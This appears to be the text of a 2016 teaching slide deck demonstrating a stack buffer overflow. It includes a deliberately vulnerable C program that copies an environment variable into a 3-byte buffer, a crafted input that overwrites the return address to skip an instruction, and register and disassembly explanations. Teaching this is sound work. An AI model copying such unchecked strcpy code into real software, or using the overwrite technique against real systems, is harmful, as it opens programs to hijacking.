buffer overflow null
TRANSCRIPT
Anatomy of Stack Overflow attack113 August 2016
Buffer Overflow – a Demo
Bhaskar K. Divecha +91 – 98193 36001
Anatomy of Stack Overflow attack213 August 2016
Buffer Overflow – a Demo
This session :
• Explains Buffer overflow in simple manner• Demos Exploitation of vulnerable program
– Works on the Vulnerable C Program– Tweaks the stack (by sending data to
program)– Modifies the return address in stack – Calls some other instruction
Anatomy of Stack Overflow attack313 August 2016
Buffer Overflow – a Demo
What is Buffer overflow?
Buffer overflow is an anomaly where a program, while writing data to a buffer, overruns the buffer's boundary and overwrites adjacent memory locations.
Anatomy of Stack Overflow attack413 August 2016
Buffer Overflow – a Demo
What is Buffer overflow? ...contd.
A buffer overflow condition exists when a program attempts to put more data in a buffer than it can hold.
It can corrupt data, crash the program, or cause the execution of malicious code.
Anatomy of Stack Overflow attack513 August 2016
Buffer Overflow – a Demo
The Exploit
Many memory manipulation functions in C and C++ do not perform bounds checking and can easily overwrite the allocated bounds of the buffers they operate upon.
We will exploit such a vulnerable C program.
Anatomy of Stack Overflow attack613 August 2016
Buffer Overflow – a Demo
The Exploit
We will exploit such a vulnerable C program by:
– Tweaking the stack (by sending data to program)
– Modifying the return address in stack – Calling some other instruction
Anatomy of Stack Overflow attack713 August 2016
Buffer Overflow – a DemoThe Vulnerable Program void bbFunction1();
main(int bbArgc,char *bbArgv[])
{
int bbVbl = 12;
printf("\nValue of bbENV variable before calling bbFunction1 is : %d\n",bbVbl);
bbFunction1();
bbVbl = 100;
printf("\nValue of bbENV variable after calling bbFunction1 is : %d\n",bbVbl);
}
void bbFunction1()
{
char *bbENV, bbBuff[3]="BB";
bbENV=getenv("bbENV");
strcpy(bbBuff,bbENV);
printf("\nThe value of Env Vbl \"bbENV\" is -%s-\n",bbBuff);
__asm { int 3 }
}
This programs looks quite safe for the usual programmer. .
Anatomy of Stack Overflow attack813 August 2016
Buffer Overflow – a Demo
The Result of Normal run of the program
D:\>set bbENV=ABC
D:\>bbEnvVariable.exe
Value of bbENV variable before calling bbFunction1 is : 12
The value of Env Vbl "bbENV" is -ABC-
Value of bbENV variable after calling bbFunction1 is : 100
D:\>
Anatomy of Stack Overflow attack913 August 2016
Buffer Overflow – a DemoThe Vulnerable Program void bbFunction1();
main(int bbArgc,char *bbArgv[])
{
int bbVbl = 12;
printf("\nValue of bbENV variable before calling bbFunction1 is : %d\n",bbVbl);
bbFunction1();
00401021 bbVbl = 100; ▬► This instruction is bypassed0040102C printf("\nValue of bbENV variable after calling bbFunction1 is : %d\n",bbVbl);
}
void bbFunction1()
{
char *bbENV, bbBuff[3]="BB";
bbENV=getenv("bbENV");
strcpy(bbBuff,bbENV);
printf("\nThe value of Env Vbl \"bbENV\" is -%s-\n",bbBuff);
__asm { int 3 }
}
This programs looks quite safe for the usual programmer. But in fact we can bypass certain instructions and call altogether the different instruction by crafting the Environment Variable.
Anatomy of Stack Overflow attack1013 August 2016
Buffer Overflow – a Demo
The Result of the program after the Exploit
D:\>set bbENV=ABCD1234,
D:\>bbEnvVariable
Value of bbENV variable before calling bbFunction1 is : 12
The value of Env Vbl "bbENV" is -ABCD1234,-
Value of bbENV variable after calling bbFunction1 is : 12
D:\>
Anatomy of Stack Overflow attack1113 August 2016
Buffer Overflow – a Demo
Know the Concepts to Exploit this Program
1. Stack, it’s contents and it’s working during function calls and returns.
Stack - a LIFO memory structure where all the function parameters (incl. Commandline arguments), return addresses and the local variables of the function are stored. It grows downward in memory (from higher address space to lower address space).
Anatomy of Stack Overflow attack1213 August 2016
Buffer Overflow – a Demo
Know the Concepts to Exploit this Program... contd.
2. Registers
Registers are 4 bytes or 32 bits as the binary is compiled for a 32 bit system.
Anatomy of Stack Overflow attack1313 August 2016
Buffer Overflow – a Demo
Know the Concepts to Exploit this Program... contd.
2. Registers
%eip: The Instruction pointer register stores the address of the next instruction to be executed. After every instruction execution it’s value is incremented depending upon the size of an instrution.
Anatomy of Stack Overflow attack1413 August 2016
Buffer Overflow – a Demo
Know the Concepts to Exploit this Program... contd.
2. Registers
%esp: The Stack pointer register stores the address of the top of the stack. This is the address of the last element on the stack. It points to the value in stack at the lowest memory address.
Anatomy of Stack Overflow attack1513 August 2016
Buffer Overflow – a DemoKnow the Concepts to Exploit this Program
... contd.
2. Registers
%ebp: The Base pointer register usually set to %esp at the start of the function. This is done to keep tab of function parameters & local variables. Local variables are accessed by subtracting offsets from %ebp & function parameters are accessed by adding offsets to it.
Anatomy of Stack Overflow attack1613 August 2016
Buffer Overflow – a DemoDisassembly of a Vulnerable Program ...
int bbVbl = 12;
printf("\nValue of bbENV variable before calling bbFunction1 is : %d\n",bbVbl);
bbFunction1();
00401021 bbVbl = 100; ▬► This instruction is bypassed by crafting Environment Variable0040102C printf("\nValue of bbENV variable after calling bbFunction1 is : %d\n",bbVbl);
}
00401004 C7 45 FC 0C 00 00 00 mov dword ptr [ebp-4],0Ch ▬► int bbVbl = 12; 0040100B 8B 45 FC mov eax,dword ptr [ebp-4] 0040100E 50 push eax 0040100F 68 00 D0 40 00 push 40D000h 00401014 E8 76 00 00 00 call 0040108F ▬► printf “BEFORE” calling bbFunction1()00401019 83 C4 08 add esp,8 0040101C E8 1F 00 00 00 call 00401040 00401021 C7 45 FC 64 00 00 00 mov dword ptr [ebp-4],64h ▬► bbVal = 100; (BYPASSED)00401028 8B 4D FC mov ecx,dword ptr [ebp-4] 0040102B 51 push ecx 0040102C 68 3C D0 40 00 push 40D03Ch 00401031 E8 59 00 00 00 call 0040108F ▬► printf “AFTER” calling bbFunction1()
Anatomy of Stack Overflow attack1713 August 2016
Buffer Overflow – a Demo
Anatomy of Stack Overflow attack1813 August 2016
Buffer Overflow – a Demo
Anatomy of Stack Overflow attack1913 August 2016
Buffer Overflow – a Demo
References
While there are tons of information available on Internet, I glanced through following 2 sites:
https://dhavalkapil.com/blogs/Buffer-Overflow-Exploit/
https://www.owasp.org/index.php/Buffer_Overflow
Anatomy of Stack Overflow attack2013 August 2016
Thank You
Bhaskar K. Divecha+91 – 98193 36001
Buffer Overflow – a Demo